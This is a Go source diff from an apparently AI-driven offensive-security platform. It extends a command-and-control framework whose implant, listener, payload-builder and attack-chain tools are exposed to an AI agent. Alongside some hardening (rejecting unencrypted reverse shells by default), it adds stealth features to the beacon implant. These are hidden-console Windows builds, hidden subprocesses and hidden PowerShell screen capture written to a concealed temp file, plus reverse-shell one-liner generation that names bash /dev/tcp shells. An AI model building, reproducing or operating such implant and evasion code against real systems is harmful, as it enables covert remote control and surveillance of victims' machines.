@@ -292,6 +307,17 @@ func registerC2SessionTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
err := m.DB().DeleteC2Session(id) err := m.DB().DeleteC2Session(id)
return makeC2Result(map[string]interface{}{"deleted": err == nil}, err) return makeC2Result(map[string]interface{}{"deleted": err == nil}, err)
case "delete_batch":
rawIDs, _ := params["session_ids"].([]interface{})
ids := make([]string, 0, len(rawIDs))
for _, v := range rawIDs {
if s, ok := v.(string); ok && strings.TrimSpace(s) != "" {
ids = append(ids, strings.TrimSpace(s))
}
}
n, err := m.DB().DeleteC2SessionsByIDs(ids)
return makeC2Result(map[string]interface{}{"deleted": n}, err)
default: default:
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action)) return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
} }
@@ -491,11 +517,11 @@ func registerC2PayloadTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webListe
Name: builtin.ToolC2Payload, Name: builtin.ToolC2Payload,
Description: fmt.Sprintf(`C2 Payload 生成。通过 action 参数选择操作: Description: fmt.Sprintf(`C2 Payload 生成。通过 action 参数选择操作:
- oneliner: 生成单行 payload。kind 必须与监听器协议一致,否则会失败: - oneliner: 生成单行 payload。kind 必须与监听器协议一致,否则会失败:
• tcp_reverse裸 TCP 反弹,可用 kind: bash, nc, nc_mkfifo, python, perl, powershellbash 指 /dev/tcp 类,不是 HTTP • tcp_reverse默认仅支持 build 加密 Beacon;若监听器 config.allow_legacy_shell=true,才可用 kind: bash, nc, nc_mkfifo, python, perl, powershell。
• http_beacon / https_beacon / websocket:仅 HTTP(S) Beacon 轮询,oneliner 只能用 kind: curl_beacon(脚本内用 bash+curl,与「tcp 的 bash」不同)。curl_beacon 返回串末尾含「 &」用于把整个 bash -c 放后台;若用 exec/execute 同步执行,必须整段原样复制(含末尾 &)。若删掉 &,内部 while 死循环占满前台,调用会一直阻塞到超时/杀进程。 • http_beacon / https_beacon / websocket:仅 HTTP(S) Beacon 轮询,oneliner 只能用 kind: curl_beacon(脚本内用 bash+curl,与「tcp 的 bash」不同)。curl_beacon 返回串末尾含「 &」用于把整个 bash -c 放后台;若用 exec/execute 同步执行,必须整段原样复制(含末尾 &)。若删掉 &,内部 while 死循环占满前台,调用会一直阻塞到超时/杀进程。
需要经典 bash 反弹 shell 时:先 c2_listener create type=tcp_reverse,再对该监听器用 kind=bash 公网部署 tcp_reverse 请用 build 生成加密 Beacon,勿开启 allow_legacy_shell
• 省略 kind 时,会按监听器类型自动选第一个兼容类型(HTTP 系默认为 curl_beacon)。 • 省略 kind 时,会按监听器类型自动选第一个兼容类型(HTTP 系默认为 curl_beacon)。
- build: 交叉编译 beacon 二进制。支持 http_beacon / https_beacon / websocket / tcp_reversetcp_reverse 植入端回连后先发魔数 CSB1,再走与 HTTP 相同的 AES-GCM JSON 语义;未发魔数的连接仍按经典交互 shell 处理)。 - build: 交叉编译 beacon 二进制。支持 http_beacon / https_beacon / websocket / tcp_reversetcp_reverse 植入端回连后先发魔数 CSB1,再经 AES-GCM 解密且校验 ImplantToken 后才登记会话)。
依赖的监听器 bind_port 须避开本服务 Web 端口 %d(配置 server.port,与 c2_listener 描述一致),否则 Beacon 无法正确回连。`, webListenPort), 依赖的监听器 bind_port 须避开本服务 Web 端口 %d(配置 server.port,与 c2_listener 描述一致),否则 Beacon 无法正确回连。`, webListenPort),
InputSchema: map[string]interface{}{ InputSchema: map[string]interface{}{
"type": "object", "type": "object",
@@ -540,6 +566,9 @@ func registerC2PayloadTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webListe
} }
return makeC2Result(nil, fmt.Errorf("监听器类型 %s 不支持 %s,兼容类型: %v", listener.Type, kind, names)) return makeC2Result(nil, fmt.Errorf("监听器类型 %s 不支持 %s,兼容类型: %v", listener.Type, kind, names))
} }
if err := c2.ValidateOnelinerForListener(listener, kind); err != nil {
return makeC2Result(nil, err)
}
input := c2.OnelinerInput{ input := c2.OnelinerInput{
Kind: kind, Kind: kind,
Host: host, Host: host,
+19 -2
View File
@@ -47,6 +47,24 @@ func (l *oneConnListener) Accept() (net.Conn, error) {
func (l *oneConnListener) Close() error { return nil } func (l *oneConnListener) Close() error { return nil }
func (l *oneConnListener) Addr() net.Addr { return l.addr } func (l *oneConnListener) Addr() net.Addr { return l.addr }
// httpServerForTLSConn 从已有 Server 复制可服务字段,用于已握手 TLS 连接上的 HTTP 服务。
// 不能复制整个 http.Server(内含 atomic/noCopy 字段)。
func httpServerForTLSConn(src *http.Server) *http.Server {
return &http.Server{
Handler: src.Handler,
DisableGeneralOptionsHandler: src.DisableGeneralOptionsHandler,
ReadTimeout: src.ReadTimeout,
ReadHeaderTimeout: src.ReadHeaderTimeout,
WriteTimeout: src.WriteTimeout,
IdleTimeout: src.IdleTimeout,
MaxHeaderBytes: src.MaxHeaderBytes,
ConnState: src.ConnState,
ErrorLog: src.ErrorLog,
BaseContext: src.BaseContext,
ConnContext: src.ConnContext,
}
}
func isTLSHandshakeRecord(b byte) bool { func isTLSHandshakeRecord(b byte) bool {
return b == 0x16 return b == 0x16
} }
@@ -172,8 +190,7 @@ func (m *mainServerMux) serveHTTPS(pc *peekedConn, localAddr net.Addr) {
} }
} }
plain := *srv plain := httpServerForTLSConn(srv)
plain.TLSConfig = nil
ocl := &oneConnListener{conn: tlsConn, addr: localAddr} ocl := &oneConnListener{conn: tlsConn, addr: localAddr}
if err := plain.Serve(ocl); err != nil && !errors.Is(err, net.ErrClosed) && !errors.Is(err, http.ErrServerClosed) { if err := plain.Serve(ocl); err != nil && !errors.Is(err, net.ErrClosed) && !errors.Is(err, http.ErrServerClosed) {
m.logger.Debug("HTTPS 连接处理结束", zap.Error(err)) m.logger.Debug("HTTPS 连接处理结束", zap.Error(err))
+53
View File
@@ -89,6 +89,28 @@ func registerProjectFactTools(mcpServer *mcp.Server, db *database.DB, cfg *confi
"type": "string", "type": "string",
"description": "可选:关联的漏洞记录 ID", "description": "可选:关联的漏洞记录 ID",
}, },
"links": map[string]interface{}{
"type": "array",
"description": "可选:关系边(from → 当前 fact)。finding 至少 1 条 {from:target/*, type:discovered_on}finding 上记录 exploit 用 {from:exploit/*, type:exploits}。省略保留已有边;传 [] 清空全部关系边。",
"items": map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"from": map[string]interface{}{
"type": "string",
"description": "来源 fact_key:存储为 from → 当前 fact",
},
"type": map[string]interface{}{
"type": "string",
"description": "depends_on | leads_to | enables | exploits | discovered_on | contains | part_of | supports",
},
"confidence": map[string]interface{}{
"type": "string",
"description": "confirmed | tentative | deprecated",
},
},
"required": []string{"from", "type"},
},
},
}, },
"required": []string{"fact_key", "summary"}, "required": []string{"fact_key", "summary"},
}, },
@@ -124,7 +146,26 @@ func registerProjectFactTools(mcpServer *mcp.Server, db *database.DB, cfg *confi
if err != nil { if err != nil {
return textResult("错误: "+err.Error(), true), nil return textResult("错误: "+err.Error(), true), nil
} }
if _, hasLinks := args["links"]; hasLinks {
linkInputs, err := project.ParseFactLinkInputs(args["links"])
if err != nil {
return textResult("错误: "+err.Error(), true), nil
}
convID := agent.ConversationIDFromContext(ctx)
if err := project.PersistFactLinksFromParsed(db, projectID, created.FactKey, convID, linkInputs, true); err != nil {
return textResult("错误: 保存关系边失败: "+err.Error(), true), nil
}
created, _ = db.GetProjectFactByKey(projectID, created.FactKey)
} else if parsed := project.ParseLinksFromBody(created.Body); len(parsed) > 0 {
if err := project.PersistFactIncomingLinks(db, projectID, created.FactKey, parsed, true); err != nil {
return textResult("错误: 从 body 解析边失败: "+err.Error(), true), nil
}
created, _ = db.GetProjectFactByKey(projectID, created.FactKey)
}
msg := fmt.Sprintf("事实已保存。\nfact_key: %s\nid: %s\nconfidence: %s", created.FactKey, created.ID, created.Confidence) msg := fmt.Sprintf("事实已保存。\nfact_key: %s\nid: %s\nconfidence: %s", created.FactKey, created.ID, created.Confidence)
if in, _ := db.ListIncomingProjectFactEdges(projectID, created.FactKey); len(in) > 0 {
msg += "\n关系边: " + project.FormatFactLinksText(in)
}
if warn := project.SparseBodyWarningIfNeeded(f.Category, f.FactKey, f.Body); warn != "" { if warn := project.SparseBodyWarningIfNeeded(f.Category, f.FactKey, f.Body); warn != "" {
msg += warn msg += warn
} }
@@ -164,6 +205,18 @@ func registerProjectFactTools(mcpServer *mcp.Server, db *database.DB, cfg *confi
if f.SourceConversationID != "" { if f.SourceConversationID != "" {
msg += fmt.Sprintf("\nsource_conversation_id: %s", f.SourceConversationID) msg += fmt.Sprintf("\nsource_conversation_id: %s", f.SourceConversationID)
} }
if in, _ := db.ListIncomingProjectFactEdges(projectID, f.FactKey); len(in) > 0 {
msg += "\n关系边(from → 本 fact:\n"
for _, e := range in {
msg += fmt.Sprintf("- %s ← %s (%s)\n", e.EdgeType, e.SourceFactKey, e.Confidence)
}
}
if out, _ := db.ListOutgoingProjectFactEdges(projectID, f.FactKey); len(out) > 0 {
msg += "指向其他事实:\n"
for _, e := range out {
msg += fmt.Sprintf("- %s → %s (%s)\n", e.EdgeType, e.TargetFactKey, e.Confidence)
}
}
msg += "\n\n--- body ---\n" + f.Body msg += "\n\n--- body ---\n" + f.Body
if warn := project.SparseBodyWarningIfNeeded(f.Category, f.FactKey, f.Body); warn != "" { if warn := project.SparseBodyWarningIfNeeded(f.Category, f.FactKey, f.Body); warn != "" {
msg += warn msg += warn
+2 -2
View File
@@ -293,8 +293,8 @@ func registerListVulnerabilitiesTool(mcpServer *mcp.Server, db *database.DB, log
}, },
"status": map[string]interface{}{ "status": map[string]interface{}{
"type": "string", "type": "string",
"description": "按状态筛选:open、confirmed、fixed、false_positive", "description": "按状态筛选:open、confirmed、fixed、false_positive、ignored",
"enum": []string{"open", "confirmed", "fixed", "false_positive"}, "enum": []string{"open", "confirmed", "fixed", "false_positive", "ignored"},
}, },
"q": map[string]interface{}{ "q": map[string]interface{}{
"type": "string", "type": "string",
+203
View File
@@ -0,0 +1,203 @@
package attackchain
import (
"fmt"
"regexp"
"strings"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/project"
"github.com/google/uuid"
)
var promoteSlugSanitizer = regexp.MustCompile(`[^a-z0-9._/-]+`)
// PromoteToProjectResult 攻击链沉淀结果。
type PromoteToProjectResult struct {
FactsCreated int `json:"facts_created"`
FactsUpdated int `json:"facts_updated"`
EdgesCreated int `json:"edges_created"`
FactKeys []string `json:"fact_keys"`
Graph *database.ProjectFactGraph `json:"graph,omitempty"`
}
// PromoteToProject 将对话攻击链沉淀为项目事实与边。
func PromoteToProject(db *database.DB, projectID, conversationID string) (*PromoteToProjectResult, error) {
if db == nil {
return nil, fmt.Errorf("database 未初始化")
}
projectID = strings.TrimSpace(projectID)
conversationID = strings.TrimSpace(conversationID)
if projectID == "" || conversationID == "" {
return nil, fmt.Errorf("project_id 与 conversation_id 必填")
}
if _, err := db.GetProject(projectID); err != nil {
return nil, fmt.Errorf("项目不存在")
}
conv, err := db.GetConversation(conversationID)
if err != nil {
return nil, fmt.Errorf("对话不存在")
}
if pid := strings.TrimSpace(conv.ProjectID); pid != "" && pid != projectID {
return nil, fmt.Errorf("对话已绑定其他项目")
}
nodes, err := db.LoadAttackChainNodes(conversationID)
if err != nil {
return nil, err
}
edges, err := db.LoadAttackChainEdges(conversationID)
if err != nil {
return nil, err
}
if len(nodes) == 0 {
return nil, fmt.Errorf("该对话尚无攻击链,请先在对话中生成攻击链")
}
res := &PromoteToProjectResult{}
nodeToKey := make(map[string]string, len(nodes))
usedKeys := map[string]int{}
for _, node := range nodes {
key := allocatePromoteFactKey(node, usedKeys)
nodeToKey[node.ID] = key
category := mapPromoteNodeCategory(node.Type)
existing, getErr := db.GetProjectFactByKey(projectID, key)
f := &database.ProjectFact{
ProjectID: projectID,
FactKey: key,
Category: category,
Summary: strings.TrimSpace(node.Label),
Body: formatPromotedFactBody(node, conversationID),
Confidence: "tentative",
SourceConversationID: conversationID,
}
if getErr == nil && existing != nil {
f.ID = existing.ID
f.CreatedAt = existing.CreatedAt
if strings.TrimSpace(f.Summary) == "" {
f.Summary = existing.Summary
}
if _, err := db.UpsertProjectFact(f); err != nil {
return nil, err
}
res.FactsUpdated++
} else {
if _, err := db.UpsertProjectFact(f); err != nil {
return nil, err
}
res.FactsCreated++
}
res.FactKeys = append(res.FactKeys, key)
}
for _, edge := range edges {
srcKey, ok1 := nodeToKey[edge.Source]
tgtKey, ok2 := nodeToKey[edge.Target]
if !ok1 || !ok2 || srcKey == tgtKey {
continue
}
edgeType := mapPromoteEdgeType(edge.Type)
incoming, _ := db.ListIncomingProjectFactEdges(projectID, tgtKey)
merged := project.MergeLinkFromInputsUnique(promoteFromEdgeInputsFromDB(incoming), []database.ProjectFactEdgeFromInput{{From: srcKey, Type: edgeType}})
if err := db.ReplaceIncomingProjectFactEdges(projectID, tgtKey, merged); err != nil {
return nil, err
}
res.EdgesCreated++
if fact, err := db.GetProjectFactByKey(projectID, tgtKey); err == nil {
in, _ := db.ListIncomingProjectFactEdges(projectID, tgtKey)
fact.Body = project.SyncBodyLinksSection(fact.Body, in)
_, _ = db.UpsertProjectFact(fact)
}
}
graph, _ := project.BuildProjectFactGraph(db, projectID, "full", true)
res.Graph = graph
return res, nil
}
func promoteFromEdgeInputsFromDB(edges []*database.ProjectFactEdge) []database.ProjectFactEdgeFromInput {
out := make([]database.ProjectFactEdgeFromInput, 0, len(edges))
for _, e := range edges {
out = append(out, database.ProjectFactEdgeFromInput{From: e.SourceFactKey, Type: e.EdgeType, Confidence: e.Confidence})
}
return out
}
func mapPromoteNodeCategory(nodeType string) string {
switch strings.ToLower(strings.TrimSpace(nodeType)) {
case "target":
return project.FactCategoryTarget
case "vulnerability":
return project.FactCategoryFinding
case "action":
return project.FactCategoryChain
default:
return project.FactCategoryNote
}
}
func mapPromoteEdgeType(t string) string {
switch strings.ToLower(strings.TrimSpace(t)) {
case "discovers", "discovered_on", "targets":
return "discovered_on"
case "exploits":
return "exploits"
case "enables":
return "enables"
case "depends_on":
return "depends_on"
default:
return "leads_to"
}
}
func allocatePromoteFactKey(node Node, used map[string]int) string {
prefix := "chain/"
switch strings.ToLower(strings.TrimSpace(node.Type)) {
case "target":
prefix = "target/"
case "vulnerability":
prefix = "finding/"
case "action":
prefix = "chain/"
}
base := promoteSlugify(node.Label)
if base == "" {
base = promoteSlugify(node.ID)
}
if base == "" {
base = uuid.New().String()[:8]
}
key := prefix + base
if n, ok := used[key]; ok {
n++
used[key] = n
key = fmt.Sprintf("%s-%d", key, n)
} else {
used[key] = 1
}
return key
}
func promoteSlugify(s string) string {
s = strings.ToLower(strings.TrimSpace(s))
s = strings.NewReplacer(" ", "-", "—", "-", "", "-", "/", "-").Replace(s)
s = promoteSlugSanitizer.ReplaceAllString(s, "-")
s = strings.Trim(s, "-")
if len(s) > 64 {
s = s[:64]
}
return s
}
func formatPromotedFactBody(node Node, conversationID string) string {
var b strings.Builder
b.WriteString("## 来源\n")
b.WriteString(fmt.Sprintf("- 对话攻击链沉淀\n- source_conversation_id: %s\n- node_id: %s\n- node_type: %s\n\n", conversationID, node.ID, node.Type))
b.WriteString("## 摘要\n")
b.WriteString(strings.TrimSpace(node.Label))
b.WriteString("\n\n## 关联\n- 结构化关系边(自动同步):\n (见项目攻击路径图)\n")
return b.String()
}
+18 -9
View File
@@ -20,10 +20,9 @@ import (
) )
// TCPReverseListener 监听 TCP 端口,等待目标机反弹连接。 // TCPReverseListener 监听 TCP 端口,等待目标机反弹连接。
// 经典模式:纯交互式 raw shell,与 nc / bash -i >& /dev/tcp 兼容 // 默认仅接受加密 TCP Beacon:连接后先发送魔数 CSB1,再经 AES-GCM 解密且校验 ImplantToken 后才登记会话
// 二进制 Beacon:连接后先发送魔数 CSB1,随后使用与 HTTP Beacon 相同的 AES-GCM JSON 语义(成帧见 tcp_beacon_server.go // 可选经典模式(config.allow_legacy_shell=true):纯交互式 raw shell,与 nc / bash -i >& /dev/tcp 兼容,无鉴权,仅建议内网实验
// 每个新连接自动生成一个 implant_uuid(基于远端地址 + 启动时间 hash),登记为 c2_session // 任务派发(经典模式):同步 exec —— 收到 task 时直接 send 命令字节并读取输出(带结束标记)。
// 任务派发:使用同步 exec 模式 —— 收到 task 时直接 send 命令字节并读取输出(带结束标记)。
type TCPReverseListener struct { type TCPReverseListener struct {
rec *database.C2Listener rec *database.C2Listener
cfg *ListenerConfig cfg *ListenerConfig
@@ -122,12 +121,14 @@ func (l *TCPReverseListener) acceptLoop() {
} }
} }
// handleConn 一个连接=一个会话:先识别二进制 TCP Beacon(魔数 CSB1),否则走经典交互式 shell。 // handleConn 先识别加密 TCP Beacon(魔数 CSB1 + AES-GCM + Token);未通过则按配置拒绝或走经典 shell。
func (l *TCPReverseListener) handleConn(conn net.Conn) { func (l *TCPReverseListener) handleConn(conn net.Conn) {
br := bufio.NewReader(conn) br := bufio.NewReader(conn)
_ = conn.SetReadDeadline(time.Now().Add(20 * time.Second)) remote := conn.RemoteAddr().String()
prefix, err := br.Peek(4)
if err == nil && len(prefix) == 4 && string(prefix) == tcpBeaconMagic { _ = conn.SetReadDeadline(time.Now().Add(tcpBeaconPeekTimeout))
prefix, peekErr := br.Peek(4)
if peekErr == nil && len(prefix) == 4 && string(prefix) == tcpBeaconMagic {
if _, err := br.Discard(4); err != nil { if _, err := br.Discard(4); err != nil {
_ = conn.Close() _ = conn.Close()
return return
@@ -136,14 +137,22 @@ func (l *TCPReverseListener) handleConn(conn net.Conn) {
l.handleTCPBeaconSession(conn, br) l.handleTCPBeaconSession(conn, br)
return return
} }
if !l.cfg.AllowLegacyShell {
l.logger.Debug("tcp_reverse 拒绝未加密连接", zap.String("remote", remote))
_ = conn.Close()
return
}
_ = conn.SetReadDeadline(time.Time{}) _ = conn.SetReadDeadline(time.Time{})
l.handleShellConn(conn, br) l.handleShellConn(conn, br)
} }
// handleShellConn 经典裸 TCP 反弹 shell(与 nc/bash /dev/tcp 兼容)。 // handleShellConn 经典裸 TCP 反弹 shell(与 nc/bash /dev/tcp 兼容);需监听器显式开启 allow_legacy_shell
func (l *TCPReverseListener) handleShellConn(conn net.Conn, br *bufio.Reader) { func (l *TCPReverseListener) handleShellConn(conn net.Conn, br *bufio.Reader) {
remote := conn.RemoteAddr().String() remote := conn.RemoteAddr().String()
host, _, _ := net.SplitHostPort(remote) host, _, _ := net.SplitHostPort(remote)
// 用 listener+remote_ip 生成稳定 implant_uuid,使同一来源的重连复用同一会话 // 用 listener+remote_ip 生成稳定 implant_uuid,使同一来源的重连复用同一会话
uuidSeed := fmt.Sprintf("%s|%s", l.rec.ID, host) uuidSeed := fmt.Sprintf("%s|%s", l.rec.ID, host)
hash := sha256.Sum256([]byte(uuidSeed)) hash := sha256.Sum256([]byte(uuidSeed))
+41 -1
View File
@@ -381,8 +381,10 @@ func (m *Manager) IngestCheckIn(listenerID string, req ImplantCheckInRequest) (*
Metadata: req.Metadata, Metadata: req.Metadata,
} }
if existing != nil { if existing != nil {
// 保留原 ID/FirstSeenAt/Note,避免被覆盖 // 保留原 ID/FirstSeenAt/Note 与操作员设置的 sleep/jitter,避免被 beacon 心跳上报覆盖
session.FirstSeenAt = existing.FirstSeenAt session.FirstSeenAt = existing.FirstSeenAt
session.SleepSeconds = existing.SleepSeconds
session.JitterPercent = existing.JitterPercent
if session.Note == "" { if session.Note == "" {
session.Note = existing.Note session.Note = existing.Note
} }
@@ -413,6 +415,44 @@ func (m *Manager) IngestCheckIn(listenerID string, req ImplantCheckInRequest) (*
return session, nil return session, nil
} }
// SetSessionSleep 更新会话期望的心跳间隔,并向植入体下发 sleep 任务以尽快生效。
func (m *Manager) SetSessionSleep(sessionID string, sleepSeconds, jitterPercent int) (*database.C2Task, error) {
if strings.TrimSpace(sessionID) == "" {
return nil, ErrInvalidInput
}
if sleepSeconds < 1 {
sleepSeconds = 1
}
if jitterPercent < 0 {
jitterPercent = 0
}
if jitterPercent > 100 {
jitterPercent = 100
}
if err := m.db.SetC2SessionSleep(sessionID, sleepSeconds, jitterPercent); err != nil {
return nil, err
}
task, err := m.EnqueueTask(EnqueueTaskInput{
SessionID: sessionID,
TaskType: TaskTypeSleep,
Payload: map[string]interface{}{
"seconds": sleepSeconds,
"jitter": jitterPercent,
},
Source: "manual",
})
if err != nil {
m.logger.Warn("sleep 任务入队失败", zap.Error(err), zap.String("session_id", sessionID))
}
m.publishEvent("info", "session", sessionID, "",
fmt.Sprintf("Sleep 已更新: %ds (抖动 %d%%)", sleepSeconds, jitterPercent),
map[string]interface{}{
"sleep_seconds": sleepSeconds,
"jitter_percent": jitterPercent,
})
return task, nil
}
// MarkSessionDead 心跳超时检测器调用:标记会话为 dead // MarkSessionDead 心跳超时检测器调用:标记会话为 dead
func (m *Manager) MarkSessionDead(sessionID string) error { func (m *Manager) MarkSessionDead(sessionID string) error {
if err := m.db.SetC2SessionStatus(sessionID, string(SessionDead)); err != nil { if err := m.db.SetC2SessionStatus(sessionID, string(SessionDead)); err != nil {
+118
View File
@@ -0,0 +1,118 @@
package c2
import (
"path/filepath"
"testing"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
func TestIngestCheckIn_PreservesOperatorSleepOnHeartbeat(t *testing.T) {
tmp := t.TempDir()
db, err := database.NewDB(filepath.Join(tmp, "c2.sqlite"), zap.NewNop())
if err != nil {
t.Fatal(err)
}
t.Cleanup(func() { _ = db.Close() })
mgr := NewManager(db, zap.NewNop(), tmp)
ln, err := mgr.CreateListener(CreateListenerInput{
Name: "t",
Type: string(ListenerTypeHTTPBeacon),
BindHost: "127.0.0.1",
BindPort: 18080,
})
if err != nil {
t.Fatal(err)
}
first, err := mgr.IngestCheckIn(ln.ID, ImplantCheckInRequest{
ImplantUUID: "implant-uuid-1",
Hostname: "host1",
Username: "user",
OS: "darwin",
Arch: "amd64",
SleepSeconds: 5,
JitterPercent: 0,
})
if err != nil {
t.Fatal(err)
}
if err := db.SetC2SessionSleep(first.ID, 30, 20); err != nil {
t.Fatal(err)
}
second, err := mgr.IngestCheckIn(ln.ID, ImplantCheckInRequest{
ImplantUUID: "implant-uuid-1",
Hostname: "host1",
Username: "user",
OS: "darwin",
Arch: "amd64",
SleepSeconds: 5,
JitterPercent: 0,
})
if err != nil {
t.Fatal(err)
}
if second.SleepSeconds != 30 || second.JitterPercent != 20 {
t.Fatalf("expected sleep=30 jitter=20, got sleep=%d jitter=%d", second.SleepSeconds, second.JitterPercent)
}
stored, err := db.GetC2Session(first.ID)
if err != nil || stored == nil {
t.Fatal(err)
}
if stored.SleepSeconds != 30 || stored.JitterPercent != 20 {
t.Fatalf("db: expected sleep=30 jitter=20, got sleep=%d jitter=%d", stored.SleepSeconds, stored.JitterPercent)
}
}
func TestSetSessionSleep_UpdatesDBAndEnqueuesTask(t *testing.T) {
tmp := t.TempDir()
db, err := database.NewDB(filepath.Join(tmp, "c2.sqlite"), zap.NewNop())
if err != nil {
t.Fatal(err)
}
t.Cleanup(func() { _ = db.Close() })
mgr := NewManager(db, zap.NewNop(), tmp)
ln, err := mgr.CreateListener(CreateListenerInput{
Name: "t2",
Type: string(ListenerTypeHTTPBeacon),
BindHost: "127.0.0.1",
BindPort: 18081,
})
if err != nil {
t.Fatal(err)
}
sess, err := mgr.IngestCheckIn(ln.ID, ImplantCheckInRequest{
ImplantUUID: "implant-uuid-2",
Hostname: "host2",
Username: "user",
OS: "linux",
Arch: "amd64",
SleepSeconds: 5,
})
if err != nil {
t.Fatal(err)
}
task, err := mgr.SetSessionSleep(sess.ID, 15, 10)
if err != nil {
t.Fatal(err)
}
if task == nil || task.TaskType != string(TaskTypeSleep) {
t.Fatalf("expected sleep task, got %#v", task)
}
stored, err := db.GetC2Session(sess.ID)
if err != nil || stored == nil {
t.Fatal(err)
}
if stored.SleepSeconds != 15 || stored.JitterPercent != 10 {
t.Fatalf("expected sleep=15 jitter=10, got sleep=%d jitter=%d", stored.SleepSeconds, stored.JitterPercent)
}
}
+18 -5
View File
@@ -160,6 +160,18 @@ func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, erro
} }
f.Close() f.Close()
// 平台相关辅助源文件(如无窗口子进程)
for _, name := range []string{"proc_hide_windows.go", "proc_hide_unix.go"} {
helperSrc := filepath.Join(b.tmplDir, name+".tmpl")
helperData, readErr := os.ReadFile(helperSrc)
if readErr != nil {
return nil, fmt.Errorf("read helper %s: %w", name, readErr)
}
if writeErr := os.WriteFile(filepath.Join(workDir, name), helperData, 0644); writeErr != nil {
return nil, fmt.Errorf("write helper %s: %w", name, writeErr)
}
}
// 交叉编译 // 交叉编译
binName := strings.TrimSpace(in.OutputName) binName := strings.TrimSpace(in.OutputName)
if binName == "" { if binName == "" {
@@ -174,15 +186,16 @@ func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, erro
return nil, fmt.Errorf("mkdir output: %w", err) return nil, fmt.Errorf("mkdir output: %w", err)
} }
absSrcPath, err := filepath.Abs(srcPath)
if err != nil {
return nil, fmt.Errorf("abs source path: %w", err)
}
absBinPath, err := filepath.Abs(binPath) absBinPath, err := filepath.Abs(binPath)
if err != nil { if err != nil {
return nil, fmt.Errorf("abs output path: %w", err) return nil, fmt.Errorf("abs output path: %w", err)
} }
cmd := exec.Command("go", "build", "-ldflags", "-s -w -buildid=", "-trimpath", "-o", absBinPath, absSrcPath) ldflags := "-s -w -buildid="
if goos == "windows" {
// 无控制台窗口运行 beacon 本体
ldflags += " -H windowsgui"
}
cmd := exec.Command("go", "build", "-ldflags", ldflags, "-trimpath", "-o", absBinPath, ".")
cmd.Env = append(os.Environ(), cmd.Env = append(os.Environ(),
"GOOS="+goos, "GOOS="+goos,
"GOARCH="+goarch, "GOARCH="+goarch,
+20
View File
@@ -1,9 +1,12 @@
package c2 package c2
import ( import (
"encoding/json"
"fmt" "fmt"
"net/url" "net/url"
"strings" "strings"
"cyberstrike-ai/internal/database"
) )
// OnelinerKind 单行 payload 的语言/形式 // OnelinerKind 单行 payload 的语言/形式
@@ -79,6 +82,23 @@ type OnelinerInput struct {
ImplantToken string // HTTP Beacon 鉴权 token ImplantToken string // HTTP Beacon 鉴权 token
} }
// ValidateOnelinerForListener 校验 oneliner 与监听器配置是否匹配(如 tcp_reverse 默认要求加密 Beacon)。
func ValidateOnelinerForListener(listener *database.C2Listener, kind OnelinerKind) error {
if listener == nil {
return fmt.Errorf("listener is nil")
}
if ListenerType(listener.Type) == ListenerTypeTCPReverse && tcpOnelinerKinds[kind] {
cfg := &ListenerConfig{}
if strings.TrimSpace(listener.ConfigJSON) != "" {
_ = json.Unmarshal([]byte(listener.ConfigJSON), cfg)
}
if !cfg.AllowLegacyShell {
return fmt.Errorf("监听器未开启 allow_legacy_shelltcp_reverse 默认仅接受 CSB1 加密 BeaconAES-GCM + Token);请用 build 生成 beacon,或显式开启 allow_legacy_shell(公网不推荐)")
}
}
return nil
}
// GenerateOneliner 生成单行 payload。 // GenerateOneliner 生成单行 payload。
// 设计要点: // 设计要点:
// - 不依赖目标机预装的可执行(除该 oneliner 关键的 bash/python/perl 等); // - 不依赖目标机预装的可执行(除该 oneliner 关键的 bash/python/perl 等);
+3 -1
View File
@@ -729,6 +729,7 @@ func runWithTimeout(cmdStr string, timeoutSec int) (string, error) {
timeoutSec = 60 timeoutSec = 60
} }
cmd := exec.Command(shellByOS(), shellFlag(), cmdStr) cmd := exec.Command(shellByOS(), shellFlag(), cmdStr)
prepareHiddenCmd(cmd)
cwdMu.Lock() cwdMu.Lock()
cmd.Dir = currentCwd cmd.Dir = currentCwd
cwdMu.Unlock() cwdMu.Unlock()
@@ -959,7 +960,7 @@ func taskScreenshot() (string, string, string, string) {
b64Out, err = runWithTimeout("import -window root /tmp/.cs_ss.png 2>/dev/null && base64 /tmp/.cs_ss.png && rm -f /tmp/.cs_ss.png", 30) b64Out, err = runWithTimeout("import -window root /tmp/.cs_ss.png 2>/dev/null && base64 /tmp/.cs_ss.png && rm -f /tmp/.cs_ss.png", 30)
case "windows": case "windows":
ps := `Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $b=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); $g=[System.Drawing.Graphics]::FromImage($b); $g.CopyFromScreen([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Location,[System.Drawing.Point]::Empty,$b.Size); $m=New-Object IO.MemoryStream; $b.Save($m,[System.Drawing.Imaging.ImageFormat]::Png); [Convert]::ToBase64String($m.ToArray())` ps := `Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $b=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); $g=[System.Drawing.Graphics]::FromImage($b); $g.CopyFromScreen([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Location,[System.Drawing.Point]::Empty,$b.Size); $m=New-Object IO.MemoryStream; $b.Save($m,[System.Drawing.Imaging.ImageFormat]::Png); [Convert]::ToBase64String($m.ToArray())`
b64Out, err = runWithTimeout(fmt.Sprintf("powershell -NoProfile -NonInteractive -Command \"%s\"", ps), 30) b64Out, err = runWithTimeout(fmt.Sprintf("powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command \"%s\"", ps), 30)
default: default:
return "", "", "", "screenshot not supported on " + runtime.GOOS return "", "", "", "screenshot not supported on " + runtime.GOOS
} }
@@ -1200,6 +1201,7 @@ func taskLoadAssembly(payload map[string]interface{}) (string, string, string, s
cmdArgs = strings.Fields(args) cmdArgs = strings.Fields(args)
} }
